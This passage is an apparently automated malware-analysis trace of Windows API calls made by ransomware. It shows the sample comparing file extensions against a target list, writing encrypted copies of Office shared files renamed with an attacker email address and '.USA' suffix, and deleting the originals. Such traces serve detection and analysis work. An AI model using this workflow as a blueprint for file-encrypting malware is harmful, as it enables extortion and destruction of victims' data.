Tag\\LISTS\\1033\\DATES.XML") returned 77 [0041.550] lstrlenW (lpString=".dbf") returned 4 [0041.550] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.550] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 77 [0041.550] lstrlenW (lpString=".1cd") returned 4 [0041.550] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.550] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 77 [0041.550] lstrlenW (lpString=".jpg") returned 4 [0041.550] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.550] lstrcmpiW (lpString1=".XML", lpString2=".USA") returned 1 [0041.550] lstrlenW (lpString="PHONE.XML") returned 9 [0041.550] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\phone.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0041.551] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=1844) returned 1 [0041.551] CloseHandle (hObject=0x1b4) returned 1 [0041.551] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\phone.xml")) returned 0x20 [0041.551] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\phone.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0041.551] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\phone.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0041.551] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0041.551] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0041.551] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\phone.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0041.552] GetLastError () returned 0x0 [0041.552] ReadFile (in: hFile=0x1b4, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x734, lpOverlapped=0x0) returned 1 [0041.553] WriteFile (in: hFile=0x170, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0x740, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0x740, lpOverlapped=0x0) returned 1 [0041.554] ReadFile (in: hFile=0x1b4, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0041.554] WriteFile (in: hFile=0x170, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xe6, lpOverlapped=0x0) returned 1 [0041.554] SetEndOfFile (hFile=0x170) returned 1 [0041.554] CloseHandle (hObject=0x170) returned 1 [0041.555] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0041.555] SetEndOfFile (hFile=0x1b4) returned 1 [0041.555] CloseHandle (hObject=0x1b4) returned 1 [0041.556] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0041.556] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\phone.xml")) returned 1 [0041.556] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 77 [0041.556] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 77 [0041.556] lstrlenW (lpString=".doc") returned 4 [0041.556] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.556] lstrlenW (lpString=".docx") returned 5 [0041.556] lstrcmpiW (lpString1=".docx", lpString2="E.XML") returned -1 [0041.556] lstrlenW (lpString=".pdf") returned 4 [0041.556] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.556] lstrlenW (lpString=".xls") returned 4 [0041.556] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.556] lstrlenW (lpString=".xlsx") returned 5 [0041.556] lstrcmpiW (lpString1=".xlsx", lpString2="E.XML") returned -1 [0041.556] lstrlenW (lpString=".ppt") returned 4 [0041.556] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.556] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 77 [0041.556] lstrlenW (lpString=".zip") returned 4 [0041.556] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.556] lstrlenW (lpString=".rar") returned 4 [0041.556] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.556] lstrlenW (lpString=".bz2") returned 4 [0041.557] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.557] lstrlenW (lpString=".7z") returned 3 [0041.557] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.557] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 77 [0041.557] lstrlenW (lpString=".dbf") returned 4 [0041.557] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.557] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 77 [0041.557] lstrlenW (lpString=".1cd") returned 4 [0041.557] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.557] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 77 [0041.557] lstrlenW (lpString=".jpg") returned 4 [0041.557] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.557] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 77 [0041.557] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 77 [0041.557] lstrlenW (lpString=".doc") returned 4 [0041.557] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.557] lstrlenW (lpString=".docx") returned 5 [0041.557] lstrcmpiW (lpString1=".docx", lpString2="E.XML") returned -1 [0041.557] lstrlenW (lpString=".pdf") returned 4 [0041.557] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.557] lstrlenW (lpString=".xls") returned 4 [0041.557] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.557] lstrlenW (lpString=".xlsx") returned 5 [0041.557] lstrcmpiW (lpString1=".xlsx", lpString2="E.XML") returned -1 [0041.557] lstrlenW (lpString=".ppt") returned 4 [0041.557] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.557] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 77 [0041.557] lstrlenW (lpString=".zip") returned 4 [0041.558] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.558] lstrlenW (lpString=".rar") returned 4 [0041.558] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.558] lstrlenW (lpString=".bz2") returned 4 [0041.558] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.558] lstrlenW (lpString=".7z") returned 3 [0041.558] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.558] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 77 [0041.558] lstrlenW (lpString=".dbf") returned 4 [0041.558] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.558] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 77 [0041.558] lstrlenW (lpString=".1cd") returned 4 [0041.558] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.558] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\PHONE.XML") returned 77 [0041.558] lstrlenW (lpString=".jpg") returned 4 [0041.558] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.558] lstrcmpiW (lpString1=".DAT", lpString2=".USA") returned -1 [0041.558] lstrlenW (lpString="STOCKS.DAT") returned 10 [0041.558] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0041.559] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=39017) returned 1 [0041.559] CloseHandle (hObject=0x1b4) returned 1 [0041.559] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.dat")) returned 0x20 [0041.559] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.dat.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0041.560] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0041.560] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0041.560] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0041.560] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.dat.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0041.560] GetLastError () returned 0x0 [0041.560] ReadFile (in: hFile=0x1b4, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x9869, lpOverlapped=0x0) returned 1 [0041.562] WriteFile (in: hFile=0x170, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0x9870, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0x9870, lpOverlapped=0x0) returned 1 [0041.564] ReadFile (in: hFile=0x1b4, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0041.564] WriteFile (in: hFile=0x170, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xe8, lpOverlapped=0x0) returned 1 [0041.564] SetEndOfFile (hFile=0x170) returned 1 [0041.564] CloseHandle (hObject=0x170) returned 1 [0041.565] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0041.565] SetEndOfFile (hFile=0x1b4) returned 1 [0041.566] CloseHandle (hObject=0x1b4) returned 1 [0041.566] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0041.566] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.dat")) returned 1 [0041.566] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 78 [0041.566] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 78 [0041.566] lstrlenW (lpString=".doc") returned 4 [0041.567] lstrcmpiW (lpString1=".doc", lpString2=".DAT") returned 1 [0041.567] lstrlenW (lpString=".docx") returned 5 [0041.567] lstrcmpiW (lpString1=".docx", lpString2="S.DAT") returned -1 [0041.567] lstrlenW (lpString=".pdf") returned 4 [0041.567] lstrcmpiW (lpString1=".pdf", lpString2=".DAT") returned 1 [0041.567] lstrlenW (lpString=".xls") returned 4 [0041.567] lstrcmpiW (lpString1=".xls", lpString2=".DAT") returned 1 [0041.567] lstrlenW (lpString=".xlsx") returned 5 [0041.567] lstrcmpiW (lpString1=".xlsx", lpString2="S.DAT") returned -1 [0041.567] lstrlenW (lpString=".ppt") returned 4 [0041.567] lstrcmpiW (lpString1=".ppt", lpString2=".DAT") returned 1 [0041.567] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 78 [0041.567] lstrlenW (lpString=".zip") returned 4 [0041.567] lstrcmpiW (lpString1=".zip", lpString2=".DAT") returned 1 [0041.567] lstrlenW (lpString=".rar") returned 4 [0041.567] lstrcmpiW (lpString1=".rar", lpString2=".DAT") returned 1 [0041.567] lstrlenW (lpString=".bz2") returned 4 [0041.567] lstrcmpiW (lpString1=".bz2", lpString2=".DAT") returned -1 [0041.567] lstrlenW (lpString=".7z") returned 3 [0041.567] lstrcmpiW (lpString1=".7z", lpString2="DAT") returned -1 [0041.567] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 78 [0041.567] lstrlenW (lpString=".dbf") returned 4 [0041.567] lstrcmpiW (lpString1=".dbf", lpString2=".DAT") returned 1 [0041.567] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 78 [0041.567] lstrlenW (lpString=".1cd") returned 4 [0041.567] lstrcmpiW (lpString1=".1cd", lpString2=".DAT") returned -1 [0041.567] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 78 [0041.567] lstrlenW (lpString=".jpg") returned 4 [0041.567] lstrcmpiW (lpString1=".jpg", lpString2=".DAT") returned 1 [0041.567] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 78 [0041.567] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 78 [0041.567] lstrlenW (lpString=".doc") returned 4 [0041.567] lstrcmpiW (lpString1=".doc", lpString2=".DAT") returned 1 [0041.567] lstrlenW (lpString=".docx") returned 5 [0041.568] lstrcmpiW (lpString1=".docx", lpString2="S.DAT") returned -1 [0041.568] lstrlenW (lpString=".pdf") returned 4 [0041.568] lstrcmpiW (lpString1=".pdf", lpString2=".DAT") returned 1 [0041.568] lstrlenW (lpString=".xls") returned 4 [0041.568] lstrcmpiW (lpString1=".xls", lpString2=".DAT") returned 1 [0041.568] lstrlenW (lpString=".xlsx") returned 5 [0041.568] lstrcmpiW (lpString1=".xlsx", lpString2="S.DAT") returned -1 [0041.568] lstrlenW (lpString=".ppt") returned 4 [0041.568] lstrcmpiW (lpString1=".ppt", lpString2=".DAT") returned 1 [0041.568] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 78 [0041.568] lstrlenW (lpString=".zip") returned 4 [0041.568] lstrcmpiW (lpString1=".zip", lpString2=".DAT") returned 1 [0041.568] lstrlenW (lpString=".rar") returned 4 [0041.568] lstrcmpiW (lpString1=".rar", lpString2=".DAT") returned 1 [0041.568] lstrlenW (lpString=".bz2") returned 4 [0041.568] lstrcmpiW (lpString1=".bz2", lpString2=".DAT") returned -1 [0041.568] lstrlenW (lpString=".7z") returned 3 [0041.568] lstrcmpiW (lpString1=".7z", lpString2="DAT") returned -1 [0041.568] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 78 [0041.568] lstrlenW (lpString=".dbf") returned 4 [0041.568] lstrcmpiW (lpString1=".dbf", lpString2=".DAT") returned 1 [0041.568] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 78 [0041.568] lstrlenW (lpString=".1cd") returned 4 [0041.568] lstrcmpiW (lpString1=".1cd", lpString2=".DAT") returned -1 [0041.568] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.DAT") returned 78 [0041.568] lstrlenW (lpString=".jpg") returned 4 [0041.568] lstrcmpiW (lpString1=".jpg", lpString2=".DAT") returned 1 [0041.568] lstrcmpiW (lpString1=".XML", lpString2=".USA") returned 1 [0041.568] lstrlenW (lpString="STOCKS.XML") returned 10 [0041.568] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0041.569] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=2687) returned 1 [0041.569] CloseHandle (hObject=0x1b4) returned 1 [0041.569] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.xml")) returned 0x20 [0041.569] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0041.569] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0041.569] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0041.569] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0041.569] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0041.570] GetLastError () returned 0x0 [0041.570] ReadFile (in: hFile=0x1b4, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0xa7f, lpOverlapped=0x0) returned 1 [0041.889] WriteFile (in: hFile=0x170, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xa80, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xa80, lpOverlapped=0x0) returned 1 [0041.890] ReadFile (in: hFile=0x1b4, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0041.890] WriteFile (in: hFile=0x170, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xe8, lpOverlapped=0x0) returned 1 [0041.890] SetEndOfFile (hFile=0x170) returned 1 [0041.890] CloseHandle (hObject=0x170) returned 1 [0041.891] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0041.891] SetEndOfFile (hFile=0x1b4) returned 1 [0041.892] CloseHandle (hObject=0x1b4) returned 1 [0041.892] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0041.892] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.xml")) returned 1 [0041.892] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 78 [0041.892] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 78 [0041.892] lstrlenW (lpString=".doc") returned 4 [0041.892] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.892] lstrlenW (lpString=".docx") returned 5 [0041.892] lstrcmpiW (lpString1=".docx", lpString2="S.XML") returned -1 [0041.892] lstrlenW (lpString=".pdf") returned 4 [0041.892] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.892] lstrlenW (lpString=".xls") returned 4 [0041.892] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.892] lstrlenW (lpString=".xlsx") returned 5 [0041.892] lstrcmpiW (lpString1=".xlsx", lpString2="S.XML") returned -1 [0041.892] lstrlenW (lpString=".ppt") returned 4 [0041.892] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.892] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 78 [0041.892] lstrlenW (lpString=".zip") returned 4 [0041.892] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.893] lstrlenW (lpString=".rar") returned 4 [0041.893] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.893] lstrlenW (lpString=".bz2") returned 4 [0041.893] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.893] lstrlenW (lpString=".7z") returned 3 [0041.893] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.893] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 78 [0041.893] lstrlenW (lpString=".dbf") returned 4 [0041.893] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.893] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 78 [0041.893] lstrlenW (lpString=".1cd") returned 4 [0041.893] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.893] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 78 [0041.893] lstrlenW (lpString=".jpg") returned 4 [0041.893] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.893] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 78 [0041.893] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 78 [0041.893] lstrlenW (lpString=".doc") returned 4 [0041.893] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.893] lstrlenW (lpString=".docx") returned 5 [0041.893] lstrcmpiW (lpString1=".docx", lpString2="S.XML") returned -1 [0041.893] lstrlenW (lpString=".pdf") returned 4 [0041.893] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.893] lstrlenW (lpString=".xls") returned 4 [0041.893] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.893] lstrlenW (lpString=".xlsx") returned 5 [0041.893] lstrcmpiW (lpString1=".xlsx", lpString2="S.XML") returned -1 [0041.893] lstrlenW (lpString=".ppt") returned 4 [0041.893] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.893] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 78 [0041.893] lstrlenW (lpString=".zip") returned 4 [0041.893] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.893] lstrlenW (lpString=".rar") returned 4 [0041.893] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.894] lstrlenW (lpString=".bz2") returned 4 [0041.894] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.894] lstrlenW (lpString=".7z") returned 3 